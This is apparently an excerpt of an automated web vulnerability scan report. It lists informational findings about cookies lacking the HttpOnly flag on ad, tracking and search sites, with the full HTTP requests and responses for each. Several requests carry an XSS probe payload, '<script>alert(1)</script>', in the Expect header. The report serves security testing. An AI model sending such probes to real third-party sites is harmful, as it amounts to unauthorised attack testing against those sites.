User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:07:24 GMT
Expires: Mon, 02 May 2011 02:07:24 GMT
Cache-Control: private, max-age=86400
Content-Type: text/javascript; charset=UTF-8
Content-Language: en
Set-Cookie: PREF=ID=77203a7447578845:TM=1304302044:LM=1304302044:S=1q_UlsnR6eLHF2dR; expires=Wed, 01-May-2013 02:07:24 GMT; path=/; domain=translate.googleapis.com
X-Content-Type-Options: nosniff
Server: translation
X-XSS-Protection: 1; mode=block
Content-Length: 1717

_callbacks_._0gn72h6kz({'sl':{'auto':'Detect language','af':'Afrikaans','sq':'Albanian','ar':'Arabic','be':'Belarusian','bg':'Bulgarian','ca':'Catalan','zh-CN':'Chinese','hr':'Croatian','cs':'Czech','
...[SNIP]...

17.104. http://um.simpli.fi/ab_match

Summary

Severity:   Information
Confidence:   Certain
Host:   http://um.simpli.fi
Path:   /ab_match

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ab_match HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: um.simpli.fi

Response

HTTP/1.1 302 Moved Temporarily
Server: nginx
Date: Mon, 02 May 2011 02:09:12 GMT
Content-Type: text/html
Connection: close
Set-Cookie: uid=G2tSSfsD3T9Q3E3BUMibCF%3D%3D; domain=.simpli.fi; path=/; expires=Tue, 01-May-2012 02:09:12 GMT
P3P: policyref="http://www.simplifi.com/w3c/Policies.xml", CP="ADMa DEVa PSAa PSDa OUR IND DSP NON COR"
Location: http://ads.adbrite.com/adserver/vdi/762701?d=49526B1B3FDD03FBC14DDC50089BC850
Content-Length: 0


17.105. http://user.lucidmedia.com/clicksense/user

Summary

Severity:   Information
Confidence:   Certain
Host:   http://user.lucidmedia.com
Path:   /clicksense/user

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /clicksense/user?p=88436487f575811a&r=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: user.lucidmedia.com

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
Cache-Control: private
P3P: CP=NOI ADM DEV CUR
Date: Mon, 02 May 2011 02:35:25 GMT
Expires: Mon, 02 May 2011 02:35:26 GMT
Set-Cookie: 2=2yiXqyLLXLn; Domain=.lucidmedia.com; Expires=Tue, 01-May-2012 02:35:26 GMT; Path=/
Location: http://ads.adbrite.com/adserver/vdi/682865?d=null&r=http%3A%2F%2Fuser.lucidmedia.com%2Fclicksense%2Fuser%3Fp%3D88436487f575811a%26r%3D0%26i%3D
Content-Length: 0
Connection: close


17.106. http://va.px.invitemedia.com/goog_imp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://va.px.invitemedia.com
Path:   /goog_imp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /goog_imp?returnType=image&key=AdImp&cost=Tb4RXwAHNm8K5ovHrlhLb5hGYOYV9br2QoBlYA&creativeID=110455&message=eJyrVjI2VrJSMDI1NDLTUVAyNgJyTC0NjcxNgTxDIEcpJMkkKKLc0cMv18LbNL_Moygnwyep3NZWCaQcpKA0LzsvvzwPxAfpNgHSpiAjjcwMgUwTIDOvNCcHyDQDMs2MLCwtawFithu3&managed=false HTTP/1.1
Host: va.px.invitemedia.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4675364852109088&output=html&h=600&slotname=7606683569&w=160&lmt=1304337917&flash=10.2.154&url=http%3A%2F%2Fwww.greenhulk.net%2Fforums%2Fshowthread.php%3F126285-Rear-boarding-step&dt=1304319912584&bpp=8&shv=r20110427&jsv=r20110427&prev_slotnames=8870801362%2C8870801362&correlator=1304319912561&frm=0&adk=645557951&ga_vid=1539471416.1304319910&ga_sid=1304319910&ga_hid=984664005&ga_fc=1&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=45&biw=1025&bih=903&fu=0&ifi=3&dtd=5628&xpc=DefJdIvudC&p=http%3A//www.greenhulk.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=8218888f-9a83-4760-bd14-33b4666730c0; exchange_uid=eyIyIjogWyIyNzI0Mzg2MDE5MjI3ODQ2MjE4IiwgNzM0MjQ1XSwgIjQiOiBbIkNBRVNFQ0NyZjVYQkMyTExTQ3BjRWRBVjNzVSIsIDczNDI0NF19; subID="{}"; impressions="{\"578963\": [1303562003+ \"28aaa692-ea2e-30b9-be12-340089999af0\"+ 3241+ 40652+ 138]+ \"405594\": [1303072666+ \"2eefac09-883b-3f77-a8a9-19e6aac05dc5\"+ 22487+ 106641+ 227]+ \"591270\": [1304243633+ \"Tb0trgAIvYcK5XcWpVIMAw==\"+ 62896+ 25126+ 11582]}"; camp_freq_p1="eJzjkuF49ZlFgFFi4+0vb1kUGDV2vgTSBowWYD6XCMeK+axA2cl9p4GyDBoMBgwWDEDRnfeZgaKz5q9FiAIA+4cX7Q=="; io_freq_p1="eJzjkuY4HijAKLHx9pe3LAqMGm9BtAGjBZjPJcyxLRQoObnvNFCSQYPBgMGCASi41wUoOGv+WoQgAJWpFmw="; dp_rec="{\"3\": 1303562003+ \"2\": 1304243633}"; segments_p1=eJzjYuZYEMzFzHE0B0hMNwYSjRFcLBwHuxmBzHMgwdM5QH5nBzOQOVEFyNyxi5GLi2PnPmaBWQfnvGMBCv8LBxIbi4Fy6z8wAsknF0Bk038mkBwHkHnoCIi53w/IvLiXCUg2/weRa/czAgCyXiCB; partnerUID="eyI3OSI6IFsiMTc1NGJiNjUwNjIzYzViZTQzZmNhMGI1N2MzOTEwZDkiLCB0cnVlXSwgIjE5OSI6IFsiQkRGQkZGQzIzMUEyODJENkUyNDQ1QjhFNERFNEEyRTAiLCB0cnVlXSwgIjQ4IjogWyI2MjEwOTQ3MDQ3Nzg2MzAwMjY4MjgzMzg0MjY0ODU0NzEyMjg3MCIsIHRydWVdLCAiODQiOiBbIlE0emd2bldzOTk5clRTaEIiLCB0cnVlXX0="

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Mon, 02 May 2011 02:23:31 GMT
P3P: policyref="/w3c/p3p.xml", CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Expires: Mon, 02-May-2011 02:23:11 GMT
Content-Type: image/gif
Pragma: no-cache
Cache-Control: no-cache
Set-Cookie: subID="{}"; Domain=invitemedia.com; expires=Tue, 01-May-2012 02:23:31 GMT; Path=/
Set-Cookie: impressions="{\"591275\": [1304303011+ \"Tb4RXwAHNm8K5ovHrlhLbw==\"+ 62899+ 25126+ 2261]+ \"578963\": [1303562003+ \"28aaa692-ea2e-30b9-be12-340089999af0\"+ 3241+ 40652+ 138]+ \"405594\": [1303072666+ \"2eefac09-883b-3f77-a8a9-19e6aac05dc5\"+ 22487+ 106641+ 227]+ \"591270\": [1304243633+ \"Tb0trgAIvYcK5XcWpVIMAw==\"+ 62896+ 25126+ 11582]}"; Domain=invitemedia.com; expires=Tue, 01-May-2012 02:23:31 GMT; Path=/
Set-Cookie: camp_freq_p1="eJzjkuF49ZlFgEli8eofb1kUGDVW7wTSBkwWG29/ecvCJcKxYj6rAKPE5L7TQFkGDQYDBgsGoOjO+8xA0Vnz1yJEAeCpF3s="; Domain=invitemedia.com; expires=Tue, 01-May-2012 02:23:31 GMT; Path=/
Set-Cookie: segments_p1="eJzjYuZojOBi4Wj6zwQkm8FkZwczFzPHRBUgMd0YyJ/5AyQ6B0zOBZLMHAuCgcy1+xmB5PoPjECBjcVA5o5djFxcHDv3MQvMOjjnHQtQeL8fUPhgN0jdoSMgjUdzgMyTYDNO5wCJcyD+he8gky/uBZFPLoCM+xcOIjgACq4pOw=="; Domain=invitemedia.com; expires=Tue, 01-May-2012 02:23:31 GMT; Path=/
Set-Cookie: io_freq_p1="eJzjkuY4HijAJLF49Y+3LAqMGvdBtAGTxcbbX96ycAlzbAsVYJSY3HcaKMmgwWDAYMEAFNzrAhScNX8tQhAAe68V+g=="; Domain=invitemedia.com; expires=Tue, 01-May-2012 02:23:31 GMT; Path=/
Content-Length: 43

GIF89a.............!.......,...........D..;

17.107. http://www.24-7pressrelease.com/press-release/the-netherlands-1-real-estate-website-relies-on-outscan-for-vulnerability-assessment-and-management-210624.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.24-7pressrelease.com
Path:   /press-release/the-netherlands-1-real-estate-website-relies-on-outscan-for-vulnerability-assessment-and-management-210624.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /press-release/the-netherlands-1-real-estate-website-relies-on-outscan-for-vulnerability-assessment-and-management-210624.php HTTP/1.1
Host: www.24-7pressrelease.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:33:39 GMT
Server: Apache
Vary: User-Agent
Set-Cookie: tf7sid=a9l3d80hrmsh2jf67cj61qtuj2; path=/; domain=.24-7pressrelease.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 37188

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Press Release - The
...[SNIP]...

17.108. http://www.3fatchicks.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.3fatchicks.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.3fatchicks.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Date: Sun, 01 May 2011 23:47:47 GMT
Server: Apache
Content-Length: 389
X-Cnection: close
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: BIGipServerthreefatchicks_pool=518262956.20480.0000; path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>417 Expectation Failed</title>
</head><body>
<h1>Expectation Failed</h1>
<p>The expectation given in the Expect request-header
fi
...[SNIP]...

17.109. http://www.accesskansas.org/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.accesskansas.org
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.accesskansas.org
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Date: Mon, 02 May 2011 00:18:10 GMT
Server: Apache
Content-Length: 389
Connection: close
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: BIGipServerSTAT-01=QKGsRgMAa5lUWp9i2/r4yXnQdKxpymKGVJRI5Nbcz4K7PlZRpffuOmnV9NFsVVUVzv198eSCnFF+nA==; path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>417 Expectation Failed</title>
</head><body>
<h1>Expectation Failed</h1>
<p>The expectation given in the Expect request-header
fi
...[SNIP]...

17.110. http://www.ahealthyme.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ahealthyme.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.ahealthyme.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 302 Moved Temporarily
Server: "Redirect Web Server 7"
Date: Mon, 02 May 2011 00:01:30 GMT
Location: http://www.bluecrossma.com/redirect/ahealthyme/ahealthyme.html
Content-length: 0
Set-Cookie: NSC_MCW-Sfejsfdu=4481ff2429a5;Version=1;path=/


17.111. http://www.batr.org/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.batr.org
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.batr.org
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Mon, 02 May 2011 00:19:42 GMT
Set-Cookie: persist-identification=2509762001.20480.0000; expires=Mon, 02-May-2011 00:49:41 GMT; path=/
Vary: Accept-Encoding, User-Agent

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; cha
...[SNIP]...

17.112. http://www.bing.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.bing.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110423; SRCHUID=V=2&GUID=D58F516F401B4DFBA034B7592B1777FD; _UR=; s_nr=1303567291710; SRCHD=MS=1744674&SM=1&D=1740336&AF=NOFORM; MUID=B506C07761D7465D924574124E3C14DF; s_vnum=1306159291712%26vn%3D2; SRCHHPGUSR=NEWWND=0&ADLT=DEMOTE&NRSLT=10&NRSPH=2&SRCHLANG=&AS=1; countrycode=US; zipcode=75207; _HOP=I=1&TS=1304292748

Response

HTTP/1.1 200 OK
Cache-Control: private, max-age=0
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Date: Sun, 01 May 2011 23:32:30 GMT
Connection: close
Set-Cookie: _HOP=; domain=.bing.com; path=/
Set-Cookie: _SS=SID=54196B2489E649DC9D985351F7EDDDA0; domain=.bing.com; path=/
Set-Cookie: MUID=B506C07761D7465D924574124E3C14DF; expires=Tue, 30-Apr-2013 23:32:30 GMT; domain=.bing.com; path=/
Set-Cookie: OrigMUID=B506C07761D7465D924574124E3C14DF%2c2d5571d309564964970af86c3c5fef46; expires=Tue, 30-Apr-2013 23:32:30 GMT; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1752452&SM=1&D=1740336&AF=NOFORM; expires=Tue, 30-Apr-2013 23:32:30 GMT; domain=.bing.com; path=/
Content-Length: 29385

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" ><head><me
...[SNIP]...

17.113. http://www.bing.com/HPImageArchive.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /HPImageArchive.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /HPImageArchive.aspx?format=xml&idx=0&n=1&nc=1304310754936 HTTP/1.1
Host: www.bing.com
Proxy-Connection: keep-alive
Referer: http://www.bing.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110423; SRCHUID=V=2&GUID=D58F516F401B4DFBA034B7592B1777FD; _UR=; s_nr=1303567291710; s_vnum=1306159291712%26vn%3D2; SRCHHPGUSR=NEWWND=0&ADLT=DEMOTE&NRSLT=10&NRSPH=2&SRCHLANG=&AS=1; countrycode=US; zipcode=75207; _HOP=; OrigMUID=B506C07761D7465D924574124E3C14DF%2c2d5571d309564964970af86c3c5fef46; RMS=F=GgAg&A=AAAAAAAAAAAQ; _SS=SID=54196B2489E649DC9D985351F7EDDDA0&CW=983&CH=903&bIm=926; SRCHD=MS=1752452&SM=1&D=1740336&AF=NOFORM; MUID=B506C07761D7465D924574124E3C14DF&TUID=1

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 2483
Content-Type: text/xml; charset=utf-8
Date: Sun, 01 May 2011 23:32:36 GMT
Connection: close
Set-Cookie: SRCHD=MS=1752452&SM=1&D=1740336&AF=NOFORM; expires=Tue, 30-Apr-2013 23:32:36 GMT; domain=.bing.com; path=/

<?xml version="1.0" encoding="utf-8" ?><images><image><startdate>20110501</startdate><fullstartdate>201105010700</fullstartdate><enddate>20110502</enddate><url>/fd/hpk2/EmpireState_EN-US1121929261.jpg
...[SNIP]...

17.114. http://www.bing.com/fd/fb/r

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /fd/fb/r

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /fd/fb/r?v=7_04_0_906814&sId=0 HTTP/1.1
Host: www.bing.com
Proxy-Connection: keep-alive
Referer: http://www.bing.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FBB=R=0; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110423; SRCHUID=V=2&GUID=D58F516F401B4DFBA034B7592B1777FD; _UR=; s_nr=1303567291710; s_vnum=1306159291712%26vn%3D2; SRCHHPGUSR=NEWWND=0&ADLT=DEMOTE&NRSLT=10&NRSPH=2&SRCHLANG=&AS=1; countrycode=US; zipcode=75207; _HOP=; MUID=B506C07761D7465D924574124E3C14DF; OrigMUID=B506C07761D7465D924574124E3C14DF%2c2d5571d309564964970af86c3c5fef46; _SS=SID=54196B2489E649DC9D985351F7EDDDA0&CW=983&CH=903; SRCHD=MS=1752452&SM=1&D=1740336&AF=NOFORM; RMS=F=GgAg

Response

HTTP/1.1 200 OK
Cache-Control: private, max-age=15552000
Content-Type: text/html; charset=utf-8
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy.msn.com/w3c/p3p.xml"
Vary: Accept-Encoding
Date: Sun, 01 May 2011 23:32:32 GMT
Connection: close
Set-Cookie: SRCHD=MS=1752452&SM=1&D=1740336&AF=NOFORM; expires=Tue, 30-Apr-2013 23:32:32 GMT; domain=.bing.com; path=/
Content-Length: 2125

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta content="text/html; char
...[SNIP]...

17.115. http://www.bing.com/fd/fb/u

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /fd/fb/u

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /fd/fb/u?v=7_04_0_906814&sId=0 HTTP/1.1
Host: www.bing.com
Proxy-Connection: keep-alive
Referer: http://www.bing.com/fd/fb/r?v=7_04_0_906814&sId=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FBB=R=0; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110423; SRCHUID=V=2&GUID=D58F516F401B4DFBA034B7592B1777FD; _UR=; s_nr=1303567291710; s_vnum=1306159291712%26vn%3D2; SRCHHPGUSR=NEWWND=0&ADLT=DEMOTE&NRSLT=10&NRSPH=2&SRCHLANG=&AS=1; countrycode=US; zipcode=75207; _HOP=; OrigMUID=B506C07761D7465D924574124E3C14DF%2c2d5571d309564964970af86c3c5fef46; RMS=F=GgAg&A=AAAAAAAAAAAQ; _SS=SID=54196B2489E649DC9D985351F7EDDDA0&CW=983&CH=903&bIm=926; SRCHD=MS=1752452&SM=1&D=1740336&AF=NOFORM; MUID=B506C07761D7465D924574124E3C14DF&TUID=1

Response

HTTP/1.1 200 OK
Cache-Control: private, max-age=15552000
Content-Type: text/html; charset=utf-8
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy.msn.com/w3c/p3p.xml"
Vary: Accept-Encoding
Date: Sun, 01 May 2011 23:32:36 GMT
Connection: close
Set-Cookie: SRCHD=MS=1752452&SM=1&D=1740336&AF=NOFORM; expires=Tue, 30-Apr-2013 23:32:35 GMT; domain=.bing.com; path=/
Content-Length: 2611

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta content="text/html; char
...[SNIP]...

17.116. http://www.bing.com/fd/ls/l

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /fd/ls/l

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /fd/ls/l?IG=2d5571d309564964970af86c3c5fef46&PM=Y&Type=Event.CPT&DATA={%22pp%22:{%22S%22:%22L%22,%22PC%22:4,%22FC%22:-1,%22BC%22:4,%22BS%22:12,%22H%22:15,%22FE%22:-1,%22LE%22:-1,%22C1%22:-1,%22C2%22:-1,%22BP%22:134,%22KP%22:-1,%22CT%22:139,%22IL%22:0}}&P=SERP&DA=Bl2 HTTP/1.1
Host: www.bing.com
Proxy-Connection: keep-alive
Referer: http://www.bing.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110423; SRCHUID=V=2&GUID=D58F516F401B4DFBA034B7592B1777FD; _UR=; s_nr=1303567291710; s_vnum=1306159291712%26vn%3D2; SRCHHPGUSR=NEWWND=0&ADLT=DEMOTE&NRSLT=10&NRSPH=2&SRCHLANG=&AS=1; countrycode=US; zipcode=75207; _HOP=; MUID=B506C07761D7465D924574124E3C14DF; OrigMUID=B506C07761D7465D924574124E3C14DF%2c2d5571d309564964970af86c3c5fef46; SRCHD=MS=1752452&SM=1&D=1740336&AF=NOFORM; _SS=SID=54196B2489E649DC9D985351F7EDDDA0&CW=983&CH=903

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 42
Content-Type: image/gif
Expires: Sun, 12 Oct 2003 00:00:00 GMT
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy.msn.com/w3c/p3p.xml"
Date: Sun, 01 May 2011 23:32:31 GMT
Connection: close
Set-Cookie: SRCHD=MS=1752452&SM=1&D=1740336&AF=NOFORM; expires=Tue, 30-Apr-2013 23:32:30 GMT; domain=.bing.com; path=/

GIF89a.............!.......,...........L.;

17.117. http://www.bing.com/scopePopupHandler.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /scopePopupHandler.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /scopePopupHandler.aspx?IID=SERP.1000&IG=2d5571d309564964970af86c3c5fef46&PM=Y HTTP/1.1
Host: www.bing.com
Proxy-Connection: keep-alive
Referer: http://www.bing.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110423; SRCHUID=V=2&GUID=D58F516F401B4DFBA034B7592B1777FD; _UR=; s_nr=1303567291710; s_vnum=1306159291712%26vn%3D2; SRCHHPGUSR=NEWWND=0&ADLT=DEMOTE&NRSLT=10&NRSPH=2&SRCHLANG=&AS=1; countrycode=US; zipcode=75207; _HOP=; MUID=B506C07761D7465D924574124E3C14DF; OrigMUID=B506C07761D7465D924574124E3C14DF%2c2d5571d309564964970af86c3c5fef46; _SS=SID=54196B2489E649DC9D985351F7EDDDA0&CW=983&CH=903; SRCHD=MS=1752452&SM=1&D=1740336&AF=NOFORM; RMS=F=CgAg

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Date: Sun, 01 May 2011 23:32:34 GMT
Connection: close
Set-Cookie: SRCHD=MS=1752452&SM=1&D=1740336&AF=NOFORM; expires=Tue, 30-Apr-2013 23:32:33 GMT; domain=.bing.com; path=/
Content-Length: 4593

<div class="sc_pc" id="images"><ul class="sc_hl1"><li><a href="/images/search?q=wallpaper+filterui%3aimagesize-desktop_w_1024+filterui%3aimagesize-desktop_h_768&amp;qpvt=wallpaper" onmousedown="return
...[SNIP]...

17.118. http://www.blazerforum.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.blazerforum.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

